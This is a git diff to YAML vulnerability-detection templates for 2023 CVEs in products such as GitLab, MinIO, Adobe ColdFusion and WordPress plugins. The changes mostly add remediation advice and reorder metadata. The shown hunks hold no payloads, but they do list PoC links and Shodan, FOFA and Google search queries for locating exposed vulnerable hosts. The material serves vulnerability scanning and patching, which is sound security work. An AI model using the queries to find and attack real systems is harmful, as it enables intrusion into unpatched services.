b/http/cves/2023/CVE-2023-27587.yaml @@ -6,21 +6,21 @@ info: severity: medium description: | ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key. + remediation: This has been patched in commit 8533b01. Upgrading should be accompanied by deleting the current GCP API key and issuing a new one. There are no known workarounds. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587 - https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g - https://github.com/sec-fx/CVE-2023-27587-PoC - https://github.com/rozbb/readtomyshoe/commit/8533b01c818939a0fa919c7244d8dbf5daf032af - https://nvd.nist.gov/vuln/detail/CVE-2023-27587 - remediation: This has been patched in commit 8533b01. Upgrading should be accompanied by deleting the current GCP API key and issuing a new one. There are no known workarounds. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2023-27587 cwe-id: CWE-209 epss-score: 0.11296 - cpe: cpe:2.3:a:readtomyshoe_project:readtomyshoe:*:*:*:*:*:*:*:* epss-percentile: 0.94464 + cpe: cpe:2.3:a:readtomyshoe_project:readtomyshoe:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: readtomyshoe_project diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml index b19ca5e344..787ba35001 100644 --- a/http/cves/2023/CVE-2023-2780.yaml +++ b/http/cves/2023/CVE-2023-2780.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.3.1. + remediation: | + Upgrade Mlflow to version 2.3.1 or later to mitigate the vulnerability. reference: - https://huntr.dev/bounties/b12b0073-0bb0-4bd1-8fc2-ec7f17fd7689/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2780 @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-2780 cwe-id: CWE-29 epss-score: 0.01547 - cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* epss-percentile: 0.85528 + cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: http.title:"mlflow" verified: true + max-request: 3 vendor: lfprojects product: mlflow + shodan-query: http.title:"mlflow" tags: mlflow,oss,lfi,huntr,cve,cve2023,intrusive http: diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index 3e81d70577..4826ae4018 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -6,29 +6,29 @@ info: severity: medium description: | The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id. + remediation: Fixed in version 2.1.2 reference: - https://www.wordfence.com/threat-intel/vulnerabilities/id/dba3f3a6-3f55-4f4e-98e4-bb98d9c94bdd - https://wpscan.com/vulnerability/e9ef793c-e5a3-4c55-beee-56b0909f7a0d - https://nvd.nist.gov/vuln/detail/CVE-2023-2796 - http://packetstormsecurity.com/files/173984/WordPress-EventON-Calendar-4.4-Insecure-Direct-Object-Reference.html - remediation: Fixed in version 2.1.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-2796 cwe-id: CWE-862 epss-score: 0.20197 - cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* epss-percentile: 0.95694 + cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: myeventon + product: eventon + framework: wordpress shodan-query: 'vuln:CVE-2023-2796' fofa-query: "wp-content/plugins/eventon/" google-query: inurl:"/wp-content/plugins/eventon/" - framework: wordpress - vendor: myeventon - product: eventon tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,eventon,bypass http: diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml index 0f01b584b9..00fd25b09b 100644 --- a/http/cves/2023/CVE-2023-28121.yaml +++ b/http/cves/2023/CVE-2023-28121.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated. + remediation: | + Update to the latest version of the WooCommerce Payments plugin to fix the vulnerability. reference: - https://github.com/gbrsh/CVE-2023-28121 - https://nvd.nist.gov/vuln/detail/CVE-2023-28121 @@ -18,16 +20,16 @@ info: cve-id: CVE-2023-28121 cwe-id: CWE-287 epss-score: 0.93782 - cpe: cpe:2.3:a:automattic:woocommerce_payments:*:*:*:*:*:wordpress:*:* epss-percentile: 0.98781 + cpe: cpe:2.3:a:automattic:woocommerce_payments:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - google-query: inurl:/wp-content/plugins/woocommerce-payments - publicwww-query: /wp-content/plugins/woocommerce-payments + max-request: 1 vendor: automattic product: woocommerce_payments framework: wordpress + publicwww-query: /wp-content/plugins/woocommerce-payments + google-query: inurl:/wp-content/plugins/woocommerce-payments tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive variables: username: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml index aa87c7ef87..932a03b839 100644 --- a/http/cves/2023/CVE-2023-2822.yaml +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -6,26 +6,26 @@ info: severity: medium description: | A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely. + remediation: Upgrading to version 5.10.6 is able to address this issue. It is recommended to upgrade the affected component. reference: - https://medium.com/@cyberninja717/685bb1675dfb - https://medium.com/@cyberninja717/reflected-cross-site-scripting-vulnerability-in-ellucian-ethos-identity-cas-logout-page-685bb1675dfb - https://vuldb.com/?ctiid.229596 - https://vuldb.com/?id.229596 - remediation: Upgrading to version 5.10.6 is able to address this issue. It is recommended to upgrade the affected component. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-2822 cwe-id: CWE-79 epss-score: 0.02305 - cpe: cpe:2.3:a:ellucian:ethos_identity:*:*:*:*:*:*:*:* epss-percentile: 0.88289 + cpe: cpe:2.3:a:ellucian:ethos_identity:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: html:"Ellucian Company" - google-query: "login with ellucian ethos identity" vendor: ellucian product: ethos_identity + shodan-query: html:"Ellucian Company" + google-query: "login with ellucian ethos identity" tags: cve,cve2023,cas,xss,ellucian http: diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index 4de1244a21..6e2a220461 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -6,6 +6,8 @@ info: severity: high description: | An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups + remediation: | + Upgrade GitLab to a version that is not affected by the path traversal vulnerability (CVE-2023-2825). reference: - https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/ - https://github.com/Occamsec/CVE-2023-2825 @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-2825 cwe-id: CWE-22 epss-score: 0.02752 - cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:* epss-percentile: 0.89231 + cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:* metadata: - max-request: 16 - shodan-query: title:"Gitlab" verified: true + max-request: 16 vendor: gitlab product: gitlab + shodan-query: title:"Gitlab" tags: cve,cve2023,gitlab,lfi,kev,authenticated,intrusive variables: data: "{{rand_base(5)}}" diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml index 88ec791244..4ff61dd6be 100644 --- a/http/cves/2023/CVE-2023-28343.yaml +++ b/http/cves/2023/CVE-2023-28343.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability. reference: - https://github.com/ahmedalroky/Disclosures/blob/main/apesystems/os_command_injection.md - https://apsystems.com @@ -17,14 +19,14 @@ info: cve-id: CVE-2023-28343 cwe-id: CWE-78 epss-score: 0.3827 - cpe: cpe:2.3:o:apsystems:energy_communication_unit_firmware:c1.2.5:*:*:*:*:*:*:* epss-percentile: 0.96725 + cpe: cpe:2.3:o:apsystems:energy_communication_unit_firmware:c1.2.5:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: intitle:"Altenergy Power Control Software" - shodan-query: title:"Altenergy Power Control Software" vendor: apsystems product: energy_communication_unit_firmware + shodan-query: title:"Altenergy Power Control Software" + google-query: intitle:"Altenergy Power Control Software" tags: cve,cve2023,oast,altenergy,iot,packetstorm http: diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index 20d78c0dbf..9026ff090f 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -6,28 +6,28 @@ info: severity: high description: | MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted. + remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z. reference: - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q - https://github.com/minio/minio/pull/16853/files - https://github.com/golang/vulndb/issues/1667 - https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json - https://nvd.nist.gov/vuln/detail/CVE-2023-28432 - remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-28432 cwe-id: CWE-200 epss-score: 0.44017 - cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* epss-percentile: 0.96884 + cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - fofa-query: app="Minio" - shodan-query: title:"Minio Console" + max-request: 1 vendor: minio product: minio + shodan-query: title:"Minio Console" + fofa-query: app="Minio" tags: cve,cve2023,minio,console,exposure,kev http: diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml index 19dc4fcd5c..86adba6269 100644 --- a/http/cves/2023/CVE-2023-28665.yaml +++ b/http/cves/2023/CVE-2023-28665.yaml @@ -6,24 +6,24 @@ info: severity: medium description: | The Woo Bulk Price Update WordPress plugin, in versions < 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user. + remediation: Fixed in version 2.2.2 reference: - https://wpscan.com/vulnerability/6f70182c-0392-40eb-a5b9-4ff91778e036 - https://nvd.nist.gov/vuln/detail/CVE-2023-28665 - remediation: Fixed in version 2.2.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2023-28665 cwe-id: CWE-79 epss-score: 0.00082 - cpe: cpe:2.3:a:technocrackers:bulk_price_update_for_woocommerce:*:*:*:*:*:wordpress:*:* epss-percentile: 0.338 + cpe: cpe:2.3:a:technocrackers:bulk_price_update_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: technocrackers product: bulk_price_update_for_woocommerce + framework: wordpress tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,authenticated,woo-bulk-price-update http: diff --git a/http/cves/2023/CVE-2023-29084.yaml b/http/cves/2023/CVE-2023-29084.yaml index 161680e92c..5eee45ba49 100644 --- a/http/cves/2023/CVE-2023-29084.yaml +++ b/http/cves/2023/CVE-2023-29084.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in ManageEngine ADManager Plus. reference: - https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/ - https://community.grafana.com/t/release-notes-v6-3-x/19202 @@ -18,8 +20,8 @@ info: cve-id: CVE-2023-29084 cwe-id: CWE-77 epss-score: 0.23785 - cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:* epss-percentile: 0.95959 + cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: zohocorp diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index 1f8d4d8101..f69c4aba97 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -6,6 +6,8 @@ info: severity: high description: | An attacker is able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install. + remediation: | + Apply the latest security patches or updates provided by Adobe to fix the access control bypass vulnerability. reference: - https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/ - https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html @@ -15,14 +17,14 @@ info: cve-id: CVE-2023-29298 cwe-id: CWE-284,NVD-CWE-Other epss-score: 0.87627 - cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* epss-percentile: 0.98219 + cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 - fofa-query: app="Adobe-ColdFusion" - shodan-query: http.component:"Adobe ColdFusion" - product: coldfusion vendor: adobe + product: coldfusion + shodan-query: http.component:"Adobe ColdFusion" + fofa-query: app="Adobe-ColdFusion" tags: cve,cve2023,adobe,auth-bypass,coldfusion,kev http: diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index 5af3ff0324..3aa911b0d6 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction. + remediation: | + Upgrade to Adobe ColdFusion version 2023.0.0.328155 or later to mitigate this vulnerability. reference: - https://blog.projectdiscovery.io/adobe-coldfusion-rce/ - https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html @@ -15,14 +17,14 @@ info: cve-id: CVE-2023-29300 cwe-id: CWE-502 epss-score: 0.1414 - cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* epss-percentile: 0.94979 + cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 - fofa-query: app="Adobe-ColdFusion" - shodan-query: http.component:"Adobe ColdFusion" - product: coldfusion vendor: adobe + product: coldfusion + shodan-query: http.component:"Adobe ColdFusion" + fofa-query: app="Adobe-ColdFusion" tags: cve,cve2023,adobe,rce,coldfusion,deserialization variables: callback: "{{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index 9d168eab70..e69c3c0787 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID. + remediation: | + Apply the latest security patches or updates provided by cPanel to fix this vulnerability. reference: - https://blog.assetnote.io/2023/04/26/xss-million-websites-cpanel/ - https://nvd.nist.gov/vuln/detail/CVE-2023-29489 @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-29489 cwe-id: CWE-79 epss-score: 0.00276 - cpe: cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:* epss-percentile: 0.64121 + cpe: cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"cPanel" verified: true + max-request: 1 vendor: cpanel product: cpanel + shodan-query: title:"cPanel" tags: cve,cve2023,cpanel,xss http: diff --git a/http/cves/2023/CVE-2023-29622.yaml b/http/cves/2023/CVE-2023-29622.yaml index a703d9c426..2c9d2a3bbc 100644 --- a/http/cves/2023/CVE-2023-29622.yaml +++ b/http/cves/2023/CVE-2023-29622.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/SQLi - https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html @@ -17,11 +19,11 @@ info: cve-id: CVE-2023-29622 cwe-id: CWE-89 epss-score: 0.01215 - cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* epss-percentile: 0.83553 + cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: purchase_order_management_project product: purchase_order_management tags: cve,cve2023,sqli,purchase-order,poms diff --git a/http/cves/2023/CVE-2023-29623.yaml b/http/cves/2023/CVE-2023-29623.yaml index 2cd16128ba..42da7244c4 100644 --- a/http/cves/2023/CVE-2023-29623.yaml +++ b/http/cves/2023/CVE-2023-29623.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/XSS-Reflected - https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html @@ -17,11 +19,11 @@ info: cve-id: CVE-2023-29623 cwe-id: CWE-79 epss-score: 0.00102 - cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* epss-percentile: 0.40883 + cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: purchase_order_management_project product: purchase_order_management tags: cve,cve2023,xss,purchase-order-management-system diff --git a/http/cves/2023/CVE-2023-2982.yaml b/http/cves/2023/CVE-2023-2982.yaml index e461608023..7fd524f6ea 100644 --- a/http/cves/2023/CVE-2023-2982.yaml +++ b/http/cves/2023/CVE-2023-2982.yaml @@ -6,27 +6,27 @@ info: severity: critical description: | The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5. + remediation: Fixed in version 7.6.5 reference: - https://lana.codes/lanavdb/2326f41f-a39f-4fde-8627-9d29fff91443/ - https://wordpress.org/plugins/miniorange-login-openid/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2982 - https://plugins.trac.wordpress.org/browser/miniorange-login-openid/trunk/mo-openid-social-login-functions.php#L107 - https://plugins.trac.wordpress.org/changeset/2924863/miniorange-login-openid - remediation: Fixed in version 7.6.5 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-2982 cwe-id: CWE-288 epss-score: 0.01048 - cpe: cpe:2.3:a:miniorange:wordpress_social_login_and_register_\(discord\,_google\,_twitter\,_linkedin\):*:*:*:*:*:wordpress:*:* epss-percentile: 0.82159 + cpe: cpe:2.3:a:miniorange:wordpress_social_login_and_register_\(discord\,_google\,_twitter\,_linkedin\):*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: miniorange product: wordpress_social_login_and_register_\(discord\,_google\,_twitter\,_linkedin\) + framework: wordpress tags: cve,cve2023,wp,wordpress,wp-plugin,auth-bypass,miniorange http: diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml index a6063be2f4..1a06661227 100644 --- a/http/cves/2023/CVE-2023-29887.yaml +++ b/http/cves/2023/CVE-2023-29887.yaml @@ -6,6 +6,8 @@ info: severity: high description: | A Local File inclusion vulnerability in test.php in spreadsheet-reader 0.5.11 allows remote attackers to include arbitrary files via the File parameter. + remediation: | + Upgrade to a patched version of Nuovo Spreadsheet Reader or apply the vendor-provided fix to mitigate the Local File Inclusion vulnerability. reference: - https://research.hisolutions.com/2023/01/arbitrary-file-read-vulnerability-php-library-nuovo-spreadsheet-reader-0-5-11/ - https://github.com/nuovo/spreadsheet-reader/issues/169 @@ -16,11 +18,11 @@ info: cve-id: CVE-2023-29887 cwe-id: CWE-22 epss-score: 0.00439 - cpe: cpe:2.3:a:nuovo:spreadsheet-reader:0.5.11:*:*:*:*:*:*:* epss-percentile: 0.716 + cpe: cpe:2.3:a:nuovo:spreadsheet-reader:0.5.11:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: nuovo product: spreadsheet-reader tags: cve,cve2023,nuovo,spreadsheet-reader,lfi diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml index 625558392e..d6d1fa0d30 100644 --- a/http/cves/2023/CVE-2023-29919.yaml +++ b/http/cves/2023/CVE-2023-29919.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php + remediation: | + Upgrade to a patched version of SolarView Compact or apply the vendor-provided security patch to mitigate the LFI vulnerability. reference: - https://github.com/xiaosed/CVE-2023-29919 - https://nvd.nist.gov/vuln/detail/CVE-2023-29919 @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-29919 cwe-id: CWE-276 epss-score: 0.01214 - cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.83546 + cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: http.html:"SolarView Compact" + max-request: 1 vendor: contec product: solarview_compact_firmware + shodan-query: http.html:"SolarView Compact" tags: cve,cve2023,lfi,solarview,edb http: diff --git a/http/cves/2023/CVE-2023-29922.yaml b/http/cves/2023/CVE-2023-29922.yaml index ea52b4692a..7b86186c98 100644 --- a/http/cves/2023/CVE-2023-29922.yaml +++ b/http/cves/2023/CVE-2023-29922.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface. + remediation: | + Apply the latest security patch or upgrade to a patched version of PowerJob V4.3.1. reference: - https://github.com/PowerJob/PowerJob/issues/585 - https://nvd.nist.gov/vuln/detail/CVE-2023-29922 @@ -15,15 +17,15 @@ info: cve-id: CVE-2023-29922 cwe-id: CWE-1188 epss-score: 0.00538 - cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* epss-percentile: 0.74271 + cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - fofa-query: app="PowerJob" - shodan-query: html:"PowerJob" + max-request: 1 vendor: powerjob product: powerjob + shodan-query: html:"PowerJob" + fofa-query: app="PowerJob" tags: cve,cve2023,auth-bypass,powerjob variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index 9549b3f008..c91626851e 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface. + remediation: | + Upgrade PowerJob to a version higher than 4.3.2 or apply the necessary patches to fix the authentication bypass issue. reference: - https://github.com/PowerJob/PowerJob/issues/587 - https://nvd.nist.gov/vuln/detail/CVE-2023-29923 @@ -15,14 +17,14 @@ info: cve-id: CVE-2023-29923 cwe-id: CWE-276 epss-score: 0.00802 - cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* epss-percentile: 0.79495 + cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* metadata: - fofa-query: app="PowerJob" - max-request: 1 verified: true + max-request: 1 vendor: powerjob product: powerjob + fofa-query: app="PowerJob" tags: cve,cve2023,powerjob,unauth http: diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index 885d77ce37..bf348873df 100644 --- a/http/cves/2023/CVE-2023-30019.yaml +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | imgproxy <=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter. + remediation: | + Upgrade to a version of Imgproxy that is not affected by this vulnerability. reference: - https://breakandpray.com/cve-2023-30019-ssrf-in-imgproxy/ - https://github.com/imgproxy/imgproxy @@ -15,14 +17,14 @@ info: cve-id: CVE-2023-30019 cwe-id: CWE-918 epss-score: 0.00336 - cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* epss-percentile: 0.67605 + cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: "Server: imgproxy" + max-request: 1 vendor: evilmartians product: imgproxy + shodan-query: "Server: imgproxy" tags: cve,cve2023,imgproxy,ssrf,oast http: diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index 8cc499d1ea..df2f859cb3 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | PrestaShop leocustomajax 1.0 and 1.0.0 are vulnerable to SQL Injection via modules/leocustomajax/leoajax.php. + remediation: | + Apply the latest security patch or upgrade to a patched version of PrestaShop leocustomajax plugin to mitigate the SQL Injection vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-30150 - https://security.friendsofpresta.org/module/2023/06/06/leocustomajax.html @@ -17,15 +19,15 @@ info: cve-id: CVE-2023-30150 cwe-id: CWE-89 epss-score: 0.02253 - cpe: cpe:2.3:a:leotheme:leocustomajax:1.0.0:*:*:*:*:prestashop:*:* epss-percentile: 0.88149 + cpe: cpe:2.3:a:leotheme:leocustomajax:1.0.0:*:*:*:*:prestashop:*:* metadata: - max-request: 2 - shodan-query: http.component:"Prestashop" verified: true - framework: prestashop + max-request: 2 vendor: leotheme product: leocustomajax + framework: prestashop + shodan-query: http.component:"Prestashop" tags: cve,cve2023,prestashop,sqli http: diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml index 5b70eb64fb..d9f15d94de 100644 --- a/http/cves/2023/CVE-2023-30210.yaml +++ b/http/cves/2023/CVE-2023-30210.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OURPHP <= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php. + remediation: | + Upgrade to a patched version of OURPHP (7.2.1 or higher) to mitigate this vulnerability. reference: - https://www.ourphp.net/ - https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-tz-php-Reflection-xss/ @@ -16,11 +18,11 @@ info: cve-id: CVE-2023-30210 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* epss-percentile: 0.29093 + cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: ourphp product: ourphp tags: cve,cve2023,xss,ourphp,unauthenticated diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml index d881012307..8e53c11708 100644 --- a/http/cves/2023/CVE-2023-30212.yaml +++ b/http/cves/2023/CVE-2023-30212.yaml @@ -6,6 +6,8 